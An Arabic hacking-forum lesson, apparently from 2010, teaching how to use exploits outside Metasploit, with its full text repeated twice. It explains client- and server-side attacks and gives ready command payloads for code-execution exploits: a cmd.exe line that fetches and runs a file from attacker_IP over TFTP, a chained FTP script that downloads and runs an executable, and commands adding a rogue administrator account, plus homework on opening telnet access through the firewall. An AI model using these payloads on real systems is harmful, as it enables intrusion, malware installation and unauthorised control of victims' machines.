الصخره
02-16-2010, 01:59 PM
السلام عليكم ورحمه الله وبركاته
درسنا اليوم مهم جدا لعده اسباب ,
1- ايضاح ان الميتاسبلويت الطريقه الوحيده
2- توضيح لاغلب الثغرات التي نستخدمها
3- شرح للثغرات التي لا تستخدم shellcode
نبدأ وعلى بركه الله ,,
اغلب الاشخاص يظن ان كلمه الاختراق مربوطه بالميتاسبلويت وهذا خطأ !
الميتاسبلويت اداه قويه لكن هنالك ثغرات ليست بالميتاسبلويت وبعض المرات تعتبر من 0-day
لذلك سأشرح شرح سريع للتعامل مع الثغرات خارج ايطار الميتاسبلويت !
1- ثغرات خارج الميتاسبلويت
نأخذ مثلا ثغره
AOL 9.5 ActiveX 0day Exploit (heap spray) (http://www.exploit-db.com/exploits/11204)
هذه الثغره في برنامج AOL والبرنامج مشهور
على العموم افتح الثغره , راح تلاحظ ActiveX او حتى html , بعد الملاحظه راح نعرف ان الثغره تستغل
عن طريق المتصفح , بمعنى ادق الضحيه راح يتصفح هذه الصحفه ونستغل عن طريقها
victim ------------------------> attacker
victim ----------------------------------> attacker
......................---------------------------------->
نلاحظ ان اول السينارويو ,
1- الضحيه اتصل بالمهاجم
2- المهاجم ارسل الثغره وبنفس الوقت الضحيه شغل الثغره
3- حصلتا على اتصال عكسي
نستنج ان هذه الثغره من نوع client-side attack .
نذهب الى shellcode , كيفيه تغييره
دائما بأستغلال الثغره يكتب المكتشف shellcode = او ممكن يكتب الاسم غير لكن دائما تكتب على هذا الشكل .
لكن الـ shellcode في هذه الثغره كيف اكتبه , شكله غريب ؟!
shellcode في هذه الثغره مكتوب على الجافاسكربت وممكن تستخدم اداه msfpayload .
2- توضيح لاغلب الثغرات
الثغرات تنقسم الى قسمين اساسيين غير الاقسام في الدرس الثاني .
توضيح: القسمين هذا عام بمعنى مثال مع فارق التشبيه , الانسان يا مسلم يا كافر
اذا كان مسلم يكون مثلا سني او شيعي واذا كان كافر ممكن يكون يهودي نصراني .
المهم
A - ثغرات تكون تحت مظله server-side attacks
من اسمها
المهاجم يرسل الاستغلال مباشره للضحيه
attacker -----------------------> victim
ثم من بعدها يشغل الشل كود .
B - ثغرات تكون تحت مظله client-side attacks
وهذه العكس لان الضحيه يتصل بالمهاجم ومن ثم يتم الاستغلال
victim -----------------> attacker
ومن ثم يتم تشغيل الشل كود .
استغلال الثغرات تكون مكتوبه بلغات مختلفه perl ,python ,c , ruby etc
وغالبا كاتب الاستغلال يكتبها بالبدايه .. وايضا بأمكانك معرفتها بنفسك .
3- ثغرات لا تستخدم shellcode او بعض المشاكل التي تواجه الـ shellcode
IE wshom.ocx ActiveX Control Remote Code Execution (http://www.exploit-db.com/exploits/11151)
ننظر الى هذه الثغره مثلا ,
مكتشفه من الاخ , عبدالله..
المهم لو تابعنا الثغره مالها shellcode هل نعتبر ان الثغره غبيه اكيد لا .
بعض الثغرات تستعمل shellcode لكن حين نستخدم bindshell راح يحظره الجدار الناري
attacker --------------------X| victim
البعض يقول نستخدم reverseshell او اتصال عكسي , نستخدم لكن بعض المرات الجدار الناري يحظر الاتصال الخارج .
attacker------------> | X <-- victim
مافيه الا find socket shellcod وهذا له ايضا مشاكله الخاصه
بقى عندنا نستخدم code execution shellcode
الثغره اللي بالسابق تستعمل code execution لذلك راح نستخدم بعض الاوامر اللي تفيدنا بأختراق
الضحيه .
اولا الثغره تستخدم لتشغيل مثلا cmd.exe بمعنى اخر بأمكاننا التحكم بالاوامر
1- تحميل الملف ومن ثم تشغيله عن طريق tftp .
نقدر نحمل ملف ونشغله عن طريق tftp
مطلباته وجود tftp client على جهاز الضحيه وايضا tftp server على جهاز المهاجم
استعماله يكون مثلا
كود PHP:
arg1="c:\WINDOWS\system32\cmd.exe /c tftp -i attacker_IP GET file.exe && file.exe"
2- تحميل الملف ومن ثم تشغيله عن طريق ftp .
مطلباته يكون عند الضحيه ftp client
طريقه الاستخدام ftp -s:attacker.txt
مثال
arg1="c:\WINDOWS\system32\cmd.exe /c echo open ×.×.×.× 21 > silv3r00t.txt && echo USER silv3r00t >> silv3r00t.txt && echo bin >> silv3r00t.txt && echo GET silv3r00t.exe >> silv3r00t.txt && echo bye >>silv3r00t.txt && ftp:-s silv3r00t.txt && silv3r00t.exe"
نشرحه على السريع .
لزم تكتب بلمف تكست عن طريق االاوامر هذي
echo open ×.×.×.× 21 > silv3r00t.txt
طبعا الان كتبنا امر يفتح الموقع الفلاني على البورت 21 = اف تي بي
echo USER silv3r00t >> silv3r00t.txt
اليوزر نيم حق حسابي ,,
echo PASS silv3r00t >> silv3r00t.txt
الباسورد حقي للحساب ,,
echo bin >> silv3r00t.txt
طبعا الان على وضع باينري ,,
echo GET silv3r00t.exe >> silv3r00t.txt
الان حنا سحبنا الملف ,,
echo bye >>silv3r00t.txt
هذا خروج من ftp
ftp -s:silv3r00t.txt
تحميل الملف
silv3r00t.exe
نشغل الملف ..
3- الطريقه الثالثه هي اضافه يوزر
اضافه يوزر اسهل طريقه لكن مشكلتها ان المهاجم يكون على نفس الشبكه .
وهي على هذا الشكل
net user userna me password /add
net localgroup Administrateurs userna me /add
مثال
كود PHP:
arg1="c:\WINDOWS\system32\cmd.exe /c net user silv3r00t 123 /add && net localgroup Administrateurs silv3r00t /add "
نروح لسؤال اليوم
1- اكتب خطوات كل من
أ- تفعيل خدمه telnet بأستخدام sc
ب- عمل يوزر للدخول على خدمه telnet
ج- فتح بورت في الجدار الناري يسمح البورت 23 و السماح بـ IP واحد فقط للدخول على البورت
صحيح انه شوي صعب لكن بالتوفيق
درسنا اليوم مهم جدا لعده اسباب ,
1- ايضاح ان الميتاسبلويت الطريقه الوحيده
2- توضيح لاغلب الثغرات التي نستخدمها
3- شرح للثغرات التي لا تستخدم shellcode
نبدأ وعلى بركه الله ,,
اغلب الاشخاص يظن ان كلمه الاختراق مربوطه بالميتاسبلويت وهذا خطأ !
الميتاسبلويت اداه قويه لكن هنالك ثغرات ليست بالميتاسبلويت وبعض المرات تعتبر من 0-day
لذلك سأشرح شرح سريع للتعامل مع الثغرات خارج ايطار الميتاسبلويت !
1- ثغرات خارج الميتاسبلويت
نأخذ مثلا ثغره
AOL 9.5 ActiveX 0day Exploit (heap spray) (http://www.exploit-db.com/exploits/11204)
هذه الثغره في برنامج AOL والبرنامج مشهور
على العموم افتح الثغره , راح تلاحظ ActiveX او حتى html , بعد الملاحظه راح نعرف ان الثغره تستغل
عن طريق المتصفح , بمعنى ادق الضحيه راح يتصفح هذه الصحفه ونستغل عن طريقها
victim ------------------------> attacker
victim ----------------------------------> attacker
......................---------------------------------->
نلاحظ ان اول السينارويو ,
1- الضحيه اتصل بالمهاجم
2- المهاجم ارسل الثغره وبنفس الوقت الضحيه شغل الثغره
3- حصلتا على اتصال عكسي
نستنج ان هذه الثغره من نوع client-side attack .
نذهب الى shellcode , كيفيه تغييره
دائما بأستغلال الثغره يكتب المكتشف shellcode = او ممكن يكتب الاسم غير لكن دائما تكتب على هذا الشكل .
لكن الـ shellcode في هذه الثغره كيف اكتبه , شكله غريب ؟!
shellcode في هذه الثغره مكتوب على الجافاسكربت وممكن تستخدم اداه msfpayload .
2- توضيح لاغلب الثغرات
الثغرات تنقسم الى قسمين اساسيين غير الاقسام في الدرس الثاني .
توضيح: القسمين هذا عام بمعنى مثال مع فارق التشبيه , الانسان يا مسلم يا كافر
اذا كان مسلم يكون مثلا سني او شيعي واذا كان كافر ممكن يكون يهودي نصراني .
المهم
A - ثغرات تكون تحت مظله server-side attacks
من اسمها
المهاجم يرسل الاستغلال مباشره للضحيه
attacker -----------------------> victim
ثم من بعدها يشغل الشل كود .
B - ثغرات تكون تحت مظله client-side attacks
وهذه العكس لان الضحيه يتصل بالمهاجم ومن ثم يتم الاستغلال
victim -----------------> attacker
ومن ثم يتم تشغيل الشل كود .
استغلال الثغرات تكون مكتوبه بلغات مختلفه perl ,python ,c , ruby etc
وغالبا كاتب الاستغلال يكتبها بالبدايه .. وايضا بأمكانك معرفتها بنفسك .
3- ثغرات لا تستخدم shellcode او بعض المشاكل التي تواجه الـ shellcode
IE wshom.ocx ActiveX Control Remote Code Execution (http://www.exploit-db.com/exploits/11151)
ننظر الى هذه الثغره مثلا ,
مكتشفه من الاخ , عبدالله..
المهم لو تابعنا الثغره مالها shellcode هل نعتبر ان الثغره غبيه اكيد لا .
بعض الثغرات تستعمل shellcode لكن حين نستخدم bindshell راح يحظره الجدار الناري
attacker --------------------X| victim
البعض يقول نستخدم reverseshell او اتصال عكسي , نستخدم لكن بعض المرات الجدار الناري يحظر الاتصال الخارج .
attacker------------> | X <-- victim
مافيه الا find socket shellcod وهذا له ايضا مشاكله الخاصه
بقى عندنا نستخدم code execution shellcode
الثغره اللي بالسابق تستعمل code execution لذلك راح نستخدم بعض الاوامر اللي تفيدنا بأختراق
الضحيه .
اولا الثغره تستخدم لتشغيل مثلا cmd.exe بمعنى اخر بأمكاننا التحكم بالاوامر
1- تحميل الملف ومن ثم تشغيله عن طريق tftp .
نقدر نحمل ملف ونشغله عن طريق tftp
مطلباته وجود tftp client على جهاز الضحيه وايضا tftp server على جهاز المهاجم
استعماله يكون مثلا
كود PHP:
arg1="c:\WINDOWS\system32\cmd.exe /c tftp -i attacker_IP GET file.exe && file.exe"
2- تحميل الملف ومن ثم تشغيله عن طريق ftp .
مطلباته يكون عند الضحيه ftp client
طريقه الاستخدام ftp -s:attacker.txt
مثال
arg1="c:\WINDOWS\system32\cmd.exe /c echo open ×.×.×.× 21 > silv3r00t.txt && echo USER silv3r00t >> silv3r00t.txt && echo bin >> silv3r00t.txt && echo GET silv3r00t.exe >> silv3r00t.txt && echo bye >>silv3r00t.txt && ftp:-s silv3r00t.txt && silv3r00t.exe"
نشرحه على السريع .
لزم تكتب بلمف تكست عن طريق االاوامر هذي
echo open ×.×.×.× 21 > silv3r00t.txt
طبعا الان كتبنا امر يفتح الموقع الفلاني على البورت 21 = اف تي بي
echo USER silv3r00t >> silv3r00t.txt
اليوزر نيم حق حسابي ,,
echo PASS silv3r00t >> silv3r00t.txt
الباسورد حقي للحساب ,,
echo bin >> silv3r00t.txt
طبعا الان على وضع باينري ,,
echo GET silv3r00t.exe >> silv3r00t.txt
الان حنا سحبنا الملف ,,
echo bye >>silv3r00t.txt
هذا خروج من ftp
ftp -s:silv3r00t.txt
تحميل الملف
silv3r00t.exe
نشغل الملف ..
3- الطريقه الثالثه هي اضافه يوزر
اضافه يوزر اسهل طريقه لكن مشكلتها ان المهاجم يكون على نفس الشبكه .
وهي على هذا الشكل
net user userna me password /add
net localgroup Administrateurs userna me /add
مثال
كود PHP:
arg1="c:\WINDOWS\system32\cmd.exe /c net user silv3r00t 123 /add && net localgroup Administrateurs silv3r00t /add "
نروح لسؤال اليوم
1- اكتب خطوات كل من
أ- تفعيل خدمه telnet بأستخدام sc
ب- عمل يوزر للدخول على خدمه telnet
ج- فتح بورت في الجدار الناري يسمح البورت 23 و السماح بـ IP واحد فقط للدخول على البورت
صحيح انه شوي صعب لكن بالتوفيق